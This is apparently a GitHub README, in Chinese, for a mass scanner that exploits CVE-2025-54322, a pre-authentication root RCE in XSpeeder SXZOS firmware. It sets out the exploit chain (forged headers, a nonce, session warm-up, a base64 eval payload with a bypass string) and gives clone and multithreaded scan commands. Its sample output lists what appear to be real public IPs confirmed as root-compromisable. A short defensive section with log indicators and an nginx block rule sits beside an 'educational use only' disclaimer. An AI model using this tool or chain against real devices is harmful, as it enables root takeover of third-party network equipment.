一个针对 CVE-2025-54322 的多线程漏洞扫描器,该漏洞是 XSpeeder SXZOS 固件中的未认证远程代码执行漏洞,影响全球约 70,000+ 台主机。
CVE-2025-54322 是 XSpeeder SXZOS 固件中发现的一个严重预认证远程代码执行漏洞,该固件用于 SD-WAN 设备、路由器和边缘网络设备。
该漏洞存在于 SXZOS 固件的基于 Django 的 Web 界面中:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() 函数1. 计算基于时间的 nonce 用于 X-SXZ-R 头部
2. 通过 /webInfos/ 端点预热会话
3. 构造恶意载荷,包含绕过字符串 (#sUserCodexsPwd)
4. 对载荷进行 Base64 编码
5. 发送恰好包含 3 个查询参数的利用请求
6. 服务器解码并执行载荷
7. 命令以 root 权限执行
该利用绕过多层防御:
SXZ/2.3 伪造X-SXZ-R: [0-6]/webInfos/ 预热#sUserCodexsPwd 注释绕过vuln-confirm.txt# 克隆仓库
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# 安装所需依赖
pip install -r requirements.txt
创建 requirements.txt 文件:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# 使用自定义线程数扫描(默认:10)
python3 scanner.py targets.txt 20
# 使用最大线程数以获得更快结果
python3 scanner.py targets.txt 50
# 使用保守线程数扫描
python3 scanner.py targets.txt 5
创建 targets.txt 文件,每行一个目标:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE 扫描器 ║
║ 预认证 Root RCE 漏洞检查器 ║
║ 显示:仅存在漏洞的主机 ║
╚═══════════════════════════════════════════════════════════════╝
[*] 从 targets.txt 加载了 2338 个目标
[*] 使用 20 个并发线程
[*] 存在漏洞的主机将保存到:vuln-confirm.txt
[*] 开始扫描...
======================================================================
[+] 存在漏洞:https://27.40.80.93:4433
[+] 状态:VULNERABLE - RCE 已确认
[+] HTTP 状态码:500
[+] 输出:uid=0(root) gid=0(root)
======================================================================
[*] 进度:50/2338 | 发现:12 个存在漏洞
[*] 进度:100/2338 | 发现:24 个存在漏洞
======================================================================
[*] 扫描完成
======================================================================
[*] 总耗时:890.45 秒
[*] 扫描目标总数:2338
[*] 发现存在漏洞主机数:156
[*] 成功率:6.67%
======================================================================
扫描器显示:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - 存在漏洞的主机
扫描开始时间:2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
状态:VULNERABLE - RCE 已确认
输出:uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
状态:VULNERABLE - RCE 已确认
输出:uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
扫描完成时间:2025-12-27 15:45:30
扫描总数:2338
存在漏洞:156
耗时:890.45 秒
本工具仅用于教育和授权安全测试目的。
如果您发现存在漏洞的系统:
如果您管理 XSpeeder SXZOS 设备:
在日志中查找以下迹象:
/?title=*&oIp=*&chkid=*SXZ/2.3X-SXZ-R 头部#sUserCodexsPwd 的 Base64 字符串/webInfos/ 后跟根路径# Nginx 规则以阻止利用尝试
location / {
if ($args ~* "chkid=") {
return 403;
}
}
该漏洞由 pwn.ai(AI 驱动的安全研究平台)自主发现。
重要说明:这是首个公开记录的由代理发现、可远程利用的零日 RCE 漏洞。
Chirag Artani
此扫描器实现旨在帮助安全专业人员:
本项目采用 MIT 许可证 - 详情请参见 LICENSE 文件。
欢迎贡献!请随时提交 Pull Request。
如有问题、疑问或建议:
记住:能力越大,责任越大。请道德且合法地使用本工具。
保持安全。保持道德。保持合法。
| 目标数量 | 建议线程数 | 预计时间 |
|---|
| 1-10 | 5 线程 | ~1-2 分钟 |
| 10-50 | 10 线程 | ~3-5 分钟 |
| 50-100 | 20 线程 | ~5-10 分钟 |
| 100-500 | 30 线程 | ~10-20 分钟 |
| 500+ | 40-50 线程 | ~20+ 分钟 |